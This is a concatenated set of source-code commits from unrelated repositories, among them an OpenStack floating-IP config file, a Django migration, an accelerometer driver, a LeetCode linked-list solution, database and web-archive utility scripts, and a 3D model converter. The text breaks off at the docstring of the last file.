046922c6b842e5ba78fc44848ddf24e6434dd799 | Add related options to floating ip config options | vmturbo/nova,gooddata/openstack-nova,klmitch/nova,vmturbo/nova,gooddata/openstack-nova,rahulunair/nova,hanlind/nova,jianghuaw/nova,Juniper/nova,klmitch/nova,Juniper/nova,rajalokan/nova,mahak/nova,Juniper/nova,gooddata/openstack-nova,rajalokan/nova,rajalokan/nova,mahak/nova,Juniper/nova,jianghuaw/nova,openstack/nova,phenoxim/nova,openstack/nova,mikalstill/nova,rahulunair/nova,mikalstill/nova,rahulunair/nova,mikalstill/nova,vmturbo/nova,phenoxim/nova,vmturbo/nova,hanlind/nova,gooddata/openstack-nova,hanlind/nova,jianghuaw/nova,openstack/nova,klmitch/nova,jianghuaw/nova,klmitch/nova,mahak/nova,rajalokan/nova | nova/conf/floating_ips.py | nova/conf/floating_ips.py | # Copyright 2016 Huawei Technology corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
floating_ip_opts = [
cfg.StrOpt('default_floating_pool',
default='nova',
help="""
Default pool for floating IPs.
This option specifies the default floating IP pool for allocating floating IPs.
While allocating a floating ip, users can optionally pass in the name of the
pool they want to allocate from, otherwise it will be pulled from the
default pool.
If this option is not set, then 'nova' is used as default floating pool.
Possible values:
* Any string representing a floating IP pool name
"""),
cfg.BoolOpt('auto_assign_floating_ip',
default=False,
help="""
Autoassigning floating IP to VM
When set to True, floating IP is auto allocated and associated
to the VM upon creation.
"""),
cfg.StrOpt('floating_ip_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for floating IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries associated with floating IPs.
When a user adds a DNS entry for a specified domain to a floating IP,
nova will add a DNS entry using the specified floating DNS driver.
When a floating IP is deallocated, its DNS entry will automatically be deleted.
Possible values:
* Full Python path to the class to be used
Related options:
* use_neutron: this options only works with nova-network.
"""),
cfg.StrOpt('instance_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for instance IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries for instances.
On instance creation, nova will add DNS entries for the instance name and
id, using the specified instance DNS driver and domain. On instance deletion,
nova will remove the DNS entries.
Possible values:
* Full Python path to the class to be used
Related options:
* use_neutron: this options only works with nova-network.
"""),
cfg.StrOpt('instance_dns_domain',
default='',
help="""
If specified, Nova checks if the availability_zone of every instance matches
what the database says the availability_zone should be for the specified
dns_domain.
Related options:
* use_neutron: this options only works with nova-network.
""")
]
def register_opts(conf):
    """Register the floating-IP options on the given config object."""
    conf.register_opts(floating_ip_opts)
def list_opts():
    """Return the options keyed by group (for oslo sample generation)."""
    return {'DEFAULT': floating_ip_opts}
| # needs:fix_opt_description
# Copyright 2016 Huawei Technology corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
# TODO(johngarbutt) all of these opitions only work with nova-network.
# We need to find a good way to document that.
floating_ip_opts = [
cfg.StrOpt('default_floating_pool',
default='nova',
help="""
Default pool for floating IPs.
This option specifies the default floating IP pool for allocating floating IPs.
While allocating a floating ip, users can optionally pass in the name of the
pool they want to allocate from, otherwise it will be pulled from the
default pool.
If this option is not set, then 'nova' is used as default floating pool.
Possible values:
* Any string representing a floating IP pool name
"""),
cfg.BoolOpt('auto_assign_floating_ip',
default=False,
help="""
Autoassigning floating IP to VM
When set to True, floating IP is auto allocated and associated
to the VM upon creation.
"""),
cfg.StrOpt('floating_ip_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for floating IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries associated with floating IPs.
When a user adds a DNS entry for a specified domain to a floating IP,
nova will add a DNS entry using the specified floating DNS driver.
When a floating IP is deallocated, its DNS entry will automatically be deleted.
Possible values:
* Full Python path to the class to be used
"""),
cfg.StrOpt('instance_dns_manager',
default='nova.network.noop_dns_driver.NoopDNSDriver',
help="""
Full class name for the DNS Manager for instance IPs.
This option specifies the class of the driver that provides functionality
to manage DNS entries for instances.
On instance creation, nova will add DNS entries for the instance name and
id, using the specified instance DNS driver and domain. On instance deletion,
nova will remove the DNS entries.
Possible values:
* Full Python path to the class to be used
"""),
# TODO(aunnam): remove default
cfg.StrOpt('instance_dns_domain',
default='',
help="""
If specified, Nova checks if the availability_zone of every instance matches
what the database says the availability_zone should be for the specified
dns_domain.
""")
]
def register_opts(conf):
conf.register_opts(floating_ip_opts)
def list_opts():
return {'DEFAULT': floating_ip_opts}
| apache-2.0 | Python |
efee783cb87fe2015ab719699e80a661aa3b4d4b | Create main.py | cmcguinness/focusstack | main.py | main.py | import os
import cv2
import FocusStack
"""
Focus stack driver program
This program looks for a series of files of type .jpg, .jpeg, or .png
in a subdirectory "input" and then merges them together using the
FocusStack module. The output is put in the file merged.png
Author: Charles McGuinness (charles@mcguinness.us)
Copyright: Copyright 2015 Charles McGuinness
License: Apache License 2.0
"""
def stackHDRs(image_files):
focusimages = []
for img in image_files:
print "Reading in file {}".format(img)
focusimages.append(cv2.imread("input/{}".format(img)))
merged = FocusStack.focus_stack(focusimages)
cv2.imwrite("merged.png", merged)
if __name__ == "__main__":
image_files = sorted(os.listdir("input"))
for img in image_files:
if img.split(".")[-1].lower() not in ["jpg", "jpeg", "png"]:
image_files.remove(img)
stackHDRs(image_files)
print "That's All Folks!"
| apache-2.0 | Python |
|
3e0ababfeb0e22d33853d4bad68a29a0249e1a60 | Add script demonstrating thread deadlock | h5py/h5py,h5py/h5py,h5py/h5py | other/iterate_deadlock.py | other/iterate_deadlock.py |
"""
Demonstrates deadlock related to attribute iteration.
"""
from threading import Thread
import h5py
FNAME = "deadlock.hdf5"
def make_file():
    """Create the HDF5 file with 1000 numbered integer attributes on its root."""
    with h5py.File(FNAME,'w') as f:
        for idx in xrange(1000):
            f.attrs['%d'%idx] = 1
def list_attributes():
    """Open the file read-only and force iteration of all attribute names.

    Iterating the attributes is the operation whose concurrent use this
    script exercises (see module docstring).
    """
    with h5py.File(FNAME, 'r') as f:
        names = list(f.attrs)
# Run the attribute listing on two threads at once (one spawned, one on the
# main thread) to reproduce the deadlock described in the module docstring.
if __name__ == '__main__':
    make_file()
    thread = Thread(target=list_attributes)
    thread.start()
    list_attributes()
    thread.join()
| bsd-3-clause | Python |
|
b1517f63c3aa549170d77c6fb3546901fdbe744b | Remove the hard-coded extra 'cv' and 'program' fields | datamade/yournextmp-popit,datamade/yournextmp-popit,datamade/yournextmp-popit,datamade/yournextmp-popit,datamade/yournextmp-popit | candidates/migrations/0017_remove_cv_and_program_fields.py | candidates/migrations/0017_remove_cv_and_program_fields.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Drop the legacy 'cv' and 'program' columns from PersonExtra.

    Depends on migration 0016, which (per its name) moved this data into
    the generic extra-fields mechanism before the columns are removed here.
    """

    dependencies = [
        ('candidates', '0016_migrate_data_to_extra_fields'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='personextra',
            name='cv',
        ),
        migrations.RemoveField(
            model_name='personextra',
            name='program',
        ),
    ]
| agpl-3.0 | Python |
|
5789cc585a69f3c73e63a36d99c02b119f593bc9 | Create accelerometer.py | somchaisomph/RPI.GPIO.TH | gadgets/navigators/accelerometer.py | gadgets/navigators/accelerometer.py | from spi.rpi_spi import rpi_spi_dev
from spi.adc.MCP3208 import MCP3208
class ACCEL_GY61():
    """Driver for a GY-61 accelerometer breakout (ADXL335 chip).

    The chip's analog X/Y/Z outputs are sampled through an MCP3208 ADC
    attached over SPI.
    """

    def __init__(self, device=0, x_channel=0, y_channel=1, z_channel=2):
        # device: SPI device index; *_channel: MCP3208 input channel per axis.
        self.spi = rpi_spi_dev(device).spi
        self.mcp = None
        if self.spi is not None:
            self.mcp = MCP3208(self.spi)
        self.vrx_channel = x_channel
        self.vry_channel = y_channel
        self.vrz_channel = z_channel

    def get_data(self):
        """Return one (x, y, z) sample of raw ADC readings.

        Returns (0, 0, 0) when the ADC is unavailable (SPI failed to open).
        Bug fix: this path previously returned a 2-tuple (0, 0), which is
        inconsistent with the 3-tuple returned on the normal path and would
        break callers unpacking three values.
        """
        if self.mcp is None:
            return (0, 0, 0)
        xpos = self.mcp.read_adc(self.vrx_channel)
        ypos = self.mcp.read_adc(self.vry_channel)
        zpos = self.mcp.read_adc(self.vrz_channel)
        return (xpos, ypos, zpos)
| mit | Python |
|
c0da1aecb6e663d9586238e9d8f2b7a8abb40cf7 | Add transform module to place ongoing built in transformmers | timothycrosley/hug,MuhammadAlkarouri/hug,MuhammadAlkarouri/hug,MuhammadAlkarouri/hug,timothycrosley/hug,timothycrosley/hug | hug/transform.py | hug/transform.py | """hug/transform.py
Defines Hug's built-in output transforming functions
Copyright (C) 2015 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
def content_type(transformers, default=None):
    '''Build a transformer that dispatches on the request's content type.

    ``transformers`` maps a content-type string (without parameters such as
    charset) to a transformation callable; ``default`` is used when no entry
    matches.  If neither a match nor a default is found, the data is passed
    through unchanged.

    Expected mapping format::

        {'[content-type]': transformation_action, ...}
    '''
    def transform(data, request):
        # Strip any ';'-separated parameters before the lookup.
        mime = request.content_type.split(';')[0]
        handler = transformers.get(mime, default)
        if handler:
            return handler(data)
        return data
    return transform
| mit | Python |
|
3ed52b0a51ccb18b053ca69984d8072e1ffdec25 | Add 328 | cyandterry/Python-Study | Ninja/Leetcode/328_Odd_Even_Linked_List.py | Ninja/Leetcode/328_Odd_Even_Linked_List.py | """
Given a singly linked list, group all odd nodes together followed by the even nodes. Please note here we are talking about the node number and not the value in the nodes.
You should try to do it in place. The program should run in O(1) space complexity and O(nodes) time complexity.
Example 1:
Input: 1->2->3->4->5->NULL
Output: 1->3->5->2->4->NULL
Example 2:
Input: 2->1->3->5->6->4->7->NULL
Output: 2->3->6->7->1->5->4->NULL
Note:
The relative order inside both the even and odd groups should remain as it was in the input.
The first node is considered odd, the second node even and so on ...
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    def oddEvenList(self, head: "ListNode") -> "ListNode":
        """Group odd-positioned nodes before even-positioned ones, in place.

        O(n) time, O(1) extra space.  The previous implementation relinked
        nodes while still traversing the (already overwritten) ``next``
        pointers, which both routed the first node into the even chain and
        looped forever on lists of three or more nodes.  Annotations are
        quoted because ListNode is only defined by the judge environment.
        """
        if not head:
            return None
        odd = head
        even = head.next
        even_head = even
        # Advance both chains two steps at a time, stitching odd nodes
        # together and even nodes together.
        while even and even.next:
            odd.next = even.next
            odd = odd.next
            even.next = odd.next
            even = even.next
        # Append the even chain after the last odd node.
        odd.next = even_head
        return head
| mit | Python |
|
732852ae19d3e7edbbfda9394808ca245456a69b | complete re and datetime sample | r569594043/PythonBeginner | 08.StandardLibrary.py | 08.StandardLibrary.py | #-*- encoding: utf-8 -*-
'''
Python Standard Library
See Also: http://docs.python.org/3/library/index.html
'''
import re
'''
re
See Also: http://docs.python.org/3/library/re.html
'''
'''
m = re.search('H(.*?)o', 'I Say: Hello World Hello World Hello World')
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
# Error
# print(m.group(2))
else:
print('no match')
m = re.match('H(.*?)o', 'I Say: Hello World Hello World Hello World')
if m:
print(m.group(0))
print(m.group(1))
else:
print('no match') # no match
m = re.match('H(.*?)o', 'Hello World Hello World Hello World')
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
else:
print('no match')
# re.I or re.IGNORECASE
m = re.search('h(.*?)o', 'I Say: Hello World Hello World Hello World')
if m:
print(m.group(0))
print(m.group(1))
else:
print('no match') # no match
m = re.search('h(.*?)o', 'I Say: Hello World Hello World Hello World', re.I)
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
else:
print('no match')
# re.M or re.MULTILINE
str = """
I Say:
Hello world,
Hello world,
Hello world,
"""
m = re.search('^h(.*?)o', str, flags = re.M | re.I)
if m:
print(m.group(0)) # Hello
print(m.group(1)) # ell
else:
print('no match')
m = re.search('^H(.*?)o', str, re.I)
if m:
print(m.group(0))
print(m.group(1))
else:
print('no match') # no match
print(re.sub('h(.*?)o', 'hey', 'I Say: Hello World Hello World Hello World', 2, re.I)) # I Say: hey World hey World Hello World
print(re.split('h.*?o', 'I Say: Hello World Hello World Hello World', 2, re.I)) # ['I Say: ', ' World ', ' World Hello World']
l = re.findall('h.*?o', 'I Say: Hello World Hello World Hello World', re.I)
for m in l:
print(m)
# Hello
# Hello
# Hello
re_hello = re.compile('h.*?o', re.I)
l = re_hello.findall('I Say: Hello World Hello World Hello World')
for m in l:
print(m)
# Hello
# Hello
# Hello
str = 'my str is this.\n'
# regex: this\.\n
m = re.search('this\\.\\n', str)
if m:
print(m.group(0)) # this.\n
else:
print('no match')
m = re.search(r'this\.\n', str)
if m:
print(m.group(0)) # this.\n
else:
print('no match')
# re.X or re.VERBOSE
m = re.search(r"""
this # match this
\. # match .
\n # match break line
""", str, re.X)
if m:
print(m.group(0)) # this.\n
else:
print('no match')
'''
import time
import datetime
'''
strftime() and strptime() Behavior
See Also: http://docs.python.org/3/library/datetime.html#strftime-and-strptime-behavior
'''
# strptime: parse a formatted string into a time.struct_time.
print(time.strptime('2014-01-09 17:33:30', '%Y-%m-%d %H:%M:%S')) # time.struct_time(tm_year=2014, tm_mon=1, tm_mday=9, tm_hour=17, tm_min=33, tm_sec=30, tm_wday=3, tm_yday=9, tm_isdst=-1)
# strftime: format a datetime object back into a string.
print(datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d %H:%M:%S')) # 2014-01-09 17:45:25
# A parsed struct_time can be re-formatted with a different pattern.
t = time.strptime('2014-01-09 17:33:30', '%Y-%m-%d %H:%M:%S')
print(time.strftime('%m/%d/%y %I:%M:%S %p', t)) # 01/09/14 05:33:30 PM
|
bbd43a3af7fdd5eacea13fae9c1670aa5436e7bc | add data not sufficient exception that shall be raised when data provided to a feature is not sufficient | DevMine/devmine-core | features/exception_data_not_suffient.py | features/exception_data_not_suffient.py | """This exception shall be raised in case the data provided to a feature is not
sufficient"""
class DataNotSufficientError(Exception):
    """Raised when the data provided to a feature is not sufficient."""

    def __init__(self, value):
        # Forward to Exception.__init__ so e.args is populated and the
        # exception pickles/reprs normally (the original skipped this,
        # leaving args empty).
        super(DataNotSufficientError, self).__init__(value)
        self.value = value

    def __str__(self):
        return repr(self.value)
| bsd-3-clause | Python |
|
e41d4fa8a61126495dc5cc42575fa5ce5b89f1b7 | add spiel on whitespace | ireapps/coding-for-journalists,ireapps/coding-for-journalists,ireapps/coding-for-journalists | 1_start/whitespace.py | 1_start/whitespace.py | # FUN WITH WHITESPACE IN PYTHON
# Whitespace is critical in Python. Unlike some other scripting languages,
# which use characters to tell the interpreter where functions and loops
# end, Python uses structured indentation for new lines, making "blocks" of
# code.
my_string = 'New York'
print "Start spreading the news,"
if my_string == 'New York':
print "I'm leaving today,"
print "I want to be a part of it,"
for num in range(0,2):
print my_string
else:
print "you clearly don't know how this song goes. {}?".format(my_string)
# What do you think the above does? Let's step through it.
# (Notice how blank lines between code is A-OK.)
# Some other places indentation and whitespace don't matter much:
# When assigning items to a list or a string; the below is ugly, but sometimes
# it's more readable in a script to define things on different lines.
list_of_cities = [
'Buffalo',
'Key West',
'Fort Collins', 'Bakersfield' ]
wordy_string = "Four score and seven years ago, our fathers brought" \
" forth on this continent ... hmm. I" \
" am desperately trying to remember what Abraham Lincoln" \
" said, because it was one of the most important and" \
" and influentual speeches in modern history; I've even" \
" been to Gettysburg. Wow, this is pretty embarrasing."
# Tabs and spaces. Don't mix them. The interpreter will choke on it. Style
# dictates that you use four spaces instead of tabs. I generally set up my
# text editor to replace tabs on the fly or do it after I'm done with my
# script, because I much prefer hitting tab once instead of space four times.
print "Start spreading the news,"
if my_string == 'New York':
print "I'm leaving today,"
print "I want to be a part of it,"
for num in range(0,2):
print my_string
else:
print "you clearly don't know how this song goes. {}?".format(my_string)
# The above looks fine, right? You will get an IndentationError. Most text
# editors have a function
| mit | Python |
|
9760f81ce6cc7783f8fb097931e98f8234307a00 | add nilearn interface for correlations | HBClab/NiBetaSeries,HBClab/NiBetaSeries | src/nibetaseries/interfaces/nilearn.py | src/nibetaseries/interfaces/nilearn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
from nipype.interfaces.nilearn import NilearnBaseInterface
from nipype.interfaces.base import (
BaseInterfaceInputSpec, TraitedSpec,
File, SimpleInterface
)
class AtlasConnectivityInputSpec(BaseInterfaceInputSpec):
    """Input traits for the AtlasConnectivity interface."""
    timeseries_file = File(exists=True, mandatory=True,
                           desc='The 4d file being used to extract timeseries data')
    atlas_file = File(exists=True, mandatory=True,
                      desc='The atlas image with each roi given a unique index')
    atlas_lut = File(exists=True, mandatory=True,
                     desc='The atlas lookup table to match the atlas image')
class AtlasConnectivityOutputSpec(TraitedSpec):
    """Output traits for the AtlasConnectivity interface."""
    correlation_matrix = File(exists=True, desc='roi-roi fisher z transformed correlation matrix')
class AtlasConnectivity(NilearnBaseInterface, SimpleInterface):
    """Calculates correlations between regions of interest"""
    input_spec = AtlasConnectivityInputSpec
    output_spec = AtlasConnectivityOutputSpec

    def _run_interface(self, runtime):
        """Compute the roi-roi Fisher-z correlation matrix and save it as TSV.

        Writes 'fisher_z_correlation.tsv' into the node working directory
        and records its path in the 'correlation_matrix' result.
        """
        # Imported lazily so the module can be loaded without nilearn installed.
        from nilearn.input_data import NiftiLabelsMasker
        from nilearn.connectome import ConnectivityMeasure
        import numpy as np
        import pandas as pd
        import os

        # Extract one standardized timeseries per atlas label.
        masker = NiftiLabelsMasker(labels_img=self.inputs.atlas_file, standardize=True,
                                   memory='nilearn_cache', verbose=1)
        timeseries = masker.fit_transform(self.inputs.timeseries_file)
        # Pearson correlation between every pair of label timeseries.
        correlation_measure = ConnectivityMeasure(kind='correlation')
        correlation_matrix = correlation_measure.fit_transform([timeseries])[0]
        # Blank the self-correlation diagonal (always 1, not informative).
        np.fill_diagonal(correlation_matrix, np.NaN)
        # Label rows/columns with the region names from the lookup table.
        # NOTE(review): assumes the LUT has a 'regions' column ordered to
        # match the atlas label indices — confirm against the atlas files.
        atlas_lut_df = pd.read_csv(self.inputs.atlas_lut, sep='\t')
        regions = atlas_lut_df['regions']
        correlation_matrix_df = pd.DataFrame(correlation_matrix, index=regions, columns=regions)
        # Fisher r -> z transform: z = arctanh(r) = 0.5 * ln((1+r)/(1-r)).
        fisher_z_matrix_df = correlation_matrix_df.apply(lambda x: np.log((1+x) / (1-x)) * 0.5)
        # Write the matrix into the node's working directory.
        out_file = os.path.join(runtime.cwd, 'fisher_z_correlation.tsv')
        fisher_z_matrix_df.to_csv(out_file, sep='\t')
        # Record the filename in the interface outputs.
        self._results['correlation_matrix'] = out_file
        return runtime
| mit | Python |
|
eee7862cead703d11405276c1a399466c9f102c5 | add shell.py | lachie83/contrail-kubernetes,rombie/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,lachie83/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,pupapaik/contrail-kubernetes,Juniper/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,Juniper/contrail-kubernetes,Juniper/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,pupapaik/contrail-kubernetes,rombie/contrail-kubernetes,WIZARD-CXY/contrail-kubernetes,Juniper/contrail-kubernetes,lachie83/contrail-kubernetes,pupapaik/contrail-kubernetes,lachie83/contrail-kubernetes,rombie/contrail-kubernetes,pedro-r-marques/contrail-kubernetes,pupapaik/contrail-kubernetes | scripts/opencontrail-kubelet/opencontrail_kubelet/shell.py | scripts/opencontrail-kubelet/opencontrail_kubelet/shell.py | #
# Copyright (c) 2015 Juniper Networks, Inc.
#
import subprocess
import logging
class Shell:
    """Thin wrapper for running shell commands with debug logging."""

    @staticmethod
    def run(str):
        """Run a shell command; log both the command and its output.

        Returns the command's captured standard output.
        NOTE(review): shell=True executes through the shell — callers must
        never pass untrusted input here.
        """
        logging.debug('sh: %s' % str)
        output = subprocess.check_output(str, shell=True)
        logging.debug('output: %s' % output.rstrip())
        return output
| apache-2.0 | Python |
|
73369f23bd008331884d5644ba9923aae4809756 | add offline db comparison tool | akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem,akrherz/iem | scripts/DEV/postgresql/compare_counts.py | scripts/DEV/postgresql/compare_counts.py | import psycopg2
# Compare per-table row counts between two local PostgreSQL clusters
# (old on port 5555, new on port 5556) and report any mismatches —
# a sanity check after copying databases between clusters.
oldpg = psycopg2.connect(database='postgis', host='localhost', port=5555, user='mesonet')
cursor = oldpg.cursor()
dbs = []
# Enumerate every real (non-template) database on the old cluster.
cursor.execute("""SELECT datname FROM pg_database
    WHERE datistemplate = false ORDER by datname""")
for row in cursor:
    dbs.append(row[0])
for db in dbs:
    # Resume hack: skip databases up to and including 'cscap' that were
    # presumably checked on a previous run.
    if db <= 'cscap':
        continue
    print("running %s" % (db,))
    # One connection per cluster for this database.
    oldpg = psycopg2.connect(database=db, host='localhost', port=5555, user='mesonet')
    ocursor = oldpg.cursor()
    newpg = psycopg2.connect(database=db, host='localhost', port=5556, user='mesonet')
    ncursor = newpg.cursor()
    tables = []
    ocursor.execute("""SELECT table_name
    FROM information_schema.tables WHERE table_schema = 'public'
    ORDER BY table_name""")
    for row in ocursor:
        tables.append(row[0])
    for table in tables:
        # Count rows on both sides and report any difference.
        ocursor.execute("""SELECT count(*) from """+table)
        ncursor.execute("""SELECT count(*) from """+table)
        orow = ocursor.fetchone()
        nrow = ncursor.fetchone()
        if orow[0] != nrow[0]:
            print("%s->%s old:%s new:%s" % (db, table, orow[0], nrow[0]))
| mit | Python |
|
b61a423497c21fa4df818c8b5e5eaea788eb84ea | add ia_cdx_checker | ianmilligan1/WAHR,web-archive-group/WAHR,ianmilligan1/WAHR,ianmilligan1/WAHR,web-archive-group/WAHR,web-archive-group/WAHR,web-archive-group/WAHR,ianmilligan1/WAHR,web-archive-group/WAHR | scripts/ia_cdx_checker/ia_cdx_checker.py | scripts/ia_cdx_checker/ia_cdx_checker.py | #!/usr/bin/env python
"""
$ python ia_cdx_checker.py elxn42-tweets-urls-fixed-uniq-no-count.txt | cat > elx42_urls_in_ia.txt
"""
from __future__ import print_function
import sys
import json
import fileinput
import io
from urllib2 import Request, urlopen, URLError, HTTPError
# For each URL on stdin/argv files, query the Internet Archive CDX API and
# print the URL if either of its first two captures falls in Aug-Dec 2015.
for line in fileinput.input():
    elx42_url = line.rstrip('\n')
    try:
        url = 'http://web.archive.org/cdx/search/cdx?url=' + elx42_url + '&output=json&limit=-2'
        request = Request(url, headers={'User-Agent': "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"})
        jsonData = urlopen(request)
        data = json.load(jsonData)
        first_date = data[1][1]
        second_date = data[2][1]
        # Months of interest (the elxn42 collection window).  str.startswith
        # accepts a tuple of prefixes, collapsing the ten copy-pasted checks;
        # the original also printed the URL twice when both capture dates
        # matched a month — a single guarded print fixes that.
        months = ('201508', '201509', '201510', '201511', '201512')
        if first_date.startswith(months) or second_date.startswith(months):
            print(elx42_url)
    except HTTPError as e:
        # URL not in the archive (or other HTTP failure): skip it silently.
        status_code = e.code
    except IndexError as d:
        # Fewer than two capture rows came back: skip.
        index_error = d
    except ValueError as f:
        # Response body was not valid JSON: skip.
        value_error = f
| mit | Python |
|
f468ddbcf6bc752a3a7af877f5453271f7f2ea45 | add model processor script | whitingjp/whitgl,whitingjp/whitgl,whitingjp/whitgl,whitingjp/whitgl | scripts/process_model.py | scripts/process_model.py | #!/usr/bin/python
import struct
import argparse
import sys
import os.path
def process_mtl(filename):
    """Parse a Wavefront .mtl file into a list of material dicts.

    Each dict has keys 'name', 'outer' (the Kd diffuse colour) and
    'inner' (the Ks specular colour); colours default to white (1, 1, 1).
    """
    materials = []
    # 'with' closes the handle deterministically (it was leaked before).
    with open(filename) as file:
        for line in file:
            tokens = line.split()
            if not tokens:
                continue
            ident = tokens.pop(0)
            if ident == 'newmtl':
                materials.append({
                    'name': tokens[0],
                    'outer': (1, 1, 1),
                    'inner': (1, 1, 1),
                })
            elif ident == 'Kd':
                materials[-1]['outer'] = (float(tokens[0]), float(tokens[1]), float(tokens[2]))
            elif ident == 'Ks':
                materials[-1]['inner'] = (float(tokens[0]), float(tokens[1]), float(tokens[2]))
    return materials
def process_obj(filename):
    """Parse a Wavefront .obj file.

    Returns (vertices, faces, materials):
      * vertices — list of (x, y, z) float tuples;
      * faces — list of (i0, i1, i2, material_index) tuples, 1-based
        vertex indices; quads are triangulated into two triangles;
      * materials — always starts with a fallback 'default' material at
        index 0, followed by any materials loaded via 'mtllib'.
    """
    vertices = []
    faces = []
    default_material = {
        'name': 'default',
        'outer': (1, 0.1, 1),
        'inner': (1, 0.5, 1),
    }
    materials = [default_material]
    current_material = 0
    # 'with' closes the handle deterministically (it was leaked before).
    with open(filename) as file:
        for line in file:
            tokens = line.split()
            if not tokens:
                continue
            ident = tokens.pop(0)
            if ident == 'v':
                vertices.append((float(tokens[0]), float(tokens[1]), float(tokens[2])))
            elif ident == 'f':
                # Face entries may be 'v/vt/vn'; keep only the vertex index.
                faces.append((int(tokens[0].split('/')[0]),
                              int(tokens[1].split('/')[0]),
                              int(tokens[2].split('/')[0]),
                              current_material))
                if len(tokens) == 4:
                    # Triangulate a quad: second triangle reuses verts 2,3,0.
                    faces.append((int(tokens[2].split('/')[0]),
                                  int(tokens[3].split('/')[0]),
                                  int(tokens[0].split('/')[0]),
                                  current_material))
            elif ident == 'mtllib':
                # Material library path is relative to the .obj file.
                path = os.path.join(os.path.dirname(filename), tokens[0])
                materials += process_mtl(path)
            elif ident == 'usemtl':
                # Fall back to the default material if the name is unknown.
                current_material = 0
                for i, material in enumerate(materials):
                    if material['name'] == tokens[0]:
                        current_material = i
    return vertices, faces, materials
def main():
    """Command-line entry point: convert an .obj file to the .wmd format.

    Output layout: a 4-byte payload size, then for every face vertex its
    position (3 floats) plus gamma-encoded outer and inner colours
    (3 floats each).
    """
    parser = argparse.ArgumentParser(description='Convert a wavefront obj file to use in slicer.')
    parser.add_argument('src', help='obj file name')
    parser.add_argument('dst', help='wmd file name')
    args = parser.parse_args()
    print("Converting %s to %s" % (args.src, args.dst))
    vertices, faces, materials = process_obj(args.src)
    # 3 vertices per face x 3 floats x 4 bytes; colours take twice that
    # (two 3-float colours per vertex).
    vertices_size = len(faces) * 3 * 3 * 4
    colours_size = vertices_size * 2
    size = vertices_size + colours_size
    print("Vertices %d size %d" % (len(faces) * 3, size))
    # 'with' guarantees the output file is flushed and closed (the handle
    # was previously leaked on every run).
    with open(args.dst, 'wb') as out:
        out.write(struct.pack('i', size))
        for face in faces:
            m = materials[face[3]]
            for index in face[:3]:
                vertex = vertices[index - 1]
                for f in vertex:
                    out.write(struct.pack('f', f))
                # Gamma-encode (gamma 2.2) both colour slots per vertex.
                for c in m['outer']:
                    out.write(struct.pack('f', c ** (1 / 2.2)))
                for c in m['inner']:
                    out.write(struct.pack('f', c ** (1 / 2.2)))
# Script entry point.
if __name__ == "__main__":
    main()
| mit | Python |
|
22ba7e7bfce711257f055733ecd260b8e61ced91 | Add example script to parse CapnProto traces | mdlui/Sigil2,mikelui/Sigil2,mdlui/Sigil2,mikelui/Sigil2,mikelui/Sigil2,VANDAL/sigil2,mdlui/Sigil2,VANDAL/sigil2,mikelui/Sigil2,VANDAL/sigil2,mdlui/Sigil2 | src/Backends/SynchroTraceGen/scripts/stgen_capnp_parser.py | src/Backends/SynchroTraceGen/scripts/stgen_capnp_parser.py | #!/bin/python
"""
This script demonstrates parsing a CapnProto SynchroTrace event trace.
The 'STEventTrace.capnp' file must exist in the sys.path.
